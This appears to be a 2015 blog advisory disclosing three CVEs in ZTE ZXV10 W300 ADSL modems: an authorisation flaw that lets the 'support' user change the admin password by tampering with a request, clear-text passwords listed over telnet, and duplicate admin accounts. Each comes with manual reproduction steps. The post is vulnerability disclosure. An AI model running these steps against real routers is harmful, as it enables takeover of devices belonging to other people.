Wednesday, November 18, 2015

ZTE ADSL ZXV10 W300 Modems - Multiple vulnerabilities

ZTE ADSL ZXV10 W300 Modems - Multiple vulnerabilities
Confirmed on 2 (of multiple) software versions - W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57

CVE-ID
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259

Note: Large deployment size, primarily in Peru, used by TdP (Telefonica del Peru).

Insufficient authorization controls
CVE-ID: CVE-2015-7257
Observed in Password Change functionality. Other functions may be vulnerable as well.
Expected behavior:
Only administrative 'admin' user should be able to change password for all the device users. 'support' is a diagnostic user with restricted privileges. It can change only its own password.
Vulnerability:
Any non-admin user can change 'admin' password.

Steps to reproduce:
a. Login as user 'support' password XXX 
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter ­ username ­ change from 'support' to 'admin'
e. Enter the new password ­> old password is not requested ­> Submit
> Login as admin 
-> Pwn!


Sensitive information disclosure - clear-text passwords
Displaying user information over Telnet connection, shows all valid users and their passwords in clear­-text.
CVE-ID: CVE-2015-7258
Steps to reproduce:
$ telnet <IP>
Trying <IP>... 
Connected to <IP>. 
Escape character is '^]'.
User Access Verification 
Username: admin 
Password: <­­­ admin/XXX1 
$sh
ADSL#login show                 <--­­­ shows user information
Username Password Priority 
admin        password1 2
support      password2 0
admin         password3 1

(Potential) Backdoor account feature - insecure account management
Same login account can exist on the device, multiple times, each with different priority#. It is possible to log in to device with either of the username/password combination.
CVE-ID: CVE-2015-7259
It is considered as a (redundant) login support feature.

Steps to reproduce:
$ telnet <IP>
Trying <IP>... 
Connected to <IP>. 
Escape character is '^]'.
User Access Verification 
User Access Verification 
Username: admin
Password: <­--­­ admin/password3
$sh
ADSL#login show
Username  Password  Priority 
admin  password1  2
support  password2  0
admin  password3  1

No comments:

Post a Comment

Disclaimer

The views, information & opinions expressed in this blog are my own and do not reflect the views of my current or former employers or employees or colleagues.